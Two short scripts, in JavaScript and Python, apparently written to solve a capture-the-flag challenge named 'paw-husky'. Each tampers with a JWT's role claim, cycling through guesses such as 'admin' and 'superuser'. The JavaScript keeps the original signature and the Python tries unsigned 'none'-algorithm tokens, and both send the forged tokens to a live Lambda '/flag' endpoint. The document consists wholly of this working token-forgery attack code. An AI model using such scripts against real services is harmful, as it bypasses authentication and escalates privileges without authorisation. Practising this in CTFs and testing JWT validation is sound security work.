File: paw-husky/decode.js
const jwt = require("jsonwebtoken");
const axios = require("axios");

const originalJwt =
  "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InBhd3MiLCJyb2xlIjoidHdpY2VfaHVza3kiLCJleHAiOjE3Mzk1OTE5NjksImlhdCI6MTczODk4NzE2OX0.H-fLIpYuzBUJhP-cfd8R6dRxZiYVEYXVVvdVmOMTRjc";

const url = "https://gg5z5bfszbqojno7wae76xr4ze0pyufg.lambda-url.us-east-1.on.aws/flag";

// Base64 decode JWT payload (middle part)
function decodeBase64Url(base64Url) {
  return Buffer.from(base64Url, "base64").toString();
}

// Extract original payload & header
const [headerB64, payloadB64, signature] = originalJwt.split(".");
const payload = JSON.parse(decodeBase64Url(payloadB64));

// Generate JWT with modified payload
const testRoles = async () => {
  const roleVariations = [
    "single_husky",
    "admin",
    "debug",
    "superuser",
    "alpha_husky",
    "big_paws",
    "pack_leader",
    "wolf",
    "paws_master",
    "master_husky",
  ];

  for (const role of roleVariations) {
    payload.role = role;

    // Re-encode payload
    const newPayloadB64 = Buffer.from(JSON.stringify(payload))
      .toString("base64")
      .replace(/=/g, "")
      .replace(/\+/g, "-")
      .replace(/\//g, "_");

    const newJwt = `${headerB64}.${newPayloadB64}.${signature}`;

    try {
      const response = await axios.get(url, {
        headers: { Authorization: `Bearer ${newJwt}` },
      });

      console.log(`Trying role: ${role}`);
      console.log(`Response: ${JSON.stringify(response.data, null, 2)}\n`);

      if (response.data.toLowerCase().includes("flag")) {
        console.log(`🎉 SUCCESS! Flag found with role: ${role}`);
        break;
      }
    } catch (error) {
      console.log(`Trying role: ${role}`);
      if (error.response) {
        console.log(`Error: ${JSON.stringify(error.response.data, null, 2)}\n`);
      } else {
        console.log(`Error: ${error.message}\n`);
      }
    }
  }
};

// Run the script
testRoles();

File: paw-husky/decode.py
import jwt
import requests

# Original JWT
original_jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InBhd3MiLCJyb2xlIjoiZG91YmxlX2h1c2t5IiwiZXhwIjoxNzM5NTkxOTY5LCJpYXQiOjE3Mzg5ODcxNjl9.60SWGnTO79TOHn2v-yjYoRDvfKxbP7Xdc7V0KWisSJk"

# Decode the JWT (without verification)
header, payload, signature = original_jwt.split('.')
decoded_payload = jwt.decode(original_jwt, options={"verify_signature": False})

# Target URL
url = "https://gg5z5bfszbqojno7wae76xr4ze0pyufg.lambda-url.us-east-1.on.aws/flag"

# Possible role values to test
role_variations = [
    "siberian_husky", "two_huskies", "twice_husky", "huskyhusky",
    "alpha_husky", "big_paws", "pack_leader", "wolf"
]

# Secret key (if known, otherwise set to None)
SECRET_KEY = None  # Replace with actual key if known

# Test each role variation
for role in role_variations:
    # Modify role
    decoded_payload["role"] = role

    # Generate new JWT
    if SECRET_KEY:
        new_jwt = jwt.encode(decoded_payload, SECRET_KEY, algorithm="HS256")
    else:
        new_jwt = jwt.encode(decoded_payload, None, algorithm="none")  # Try unsigned JWT

    # Send request with modified JWT
    headers = {"Authorization": f"Bearer {new_jwt}"}
    response = requests.get(url, headers=headers)

    # Print results
    print(f"Trying role: {role}")
    print(f"Response: {response.text}\n")

    # Check if we got the flag
    if "flag" in response.text.lower():
        print(f"🎉 SUCCESS! Flag found with role: {role}")
        break
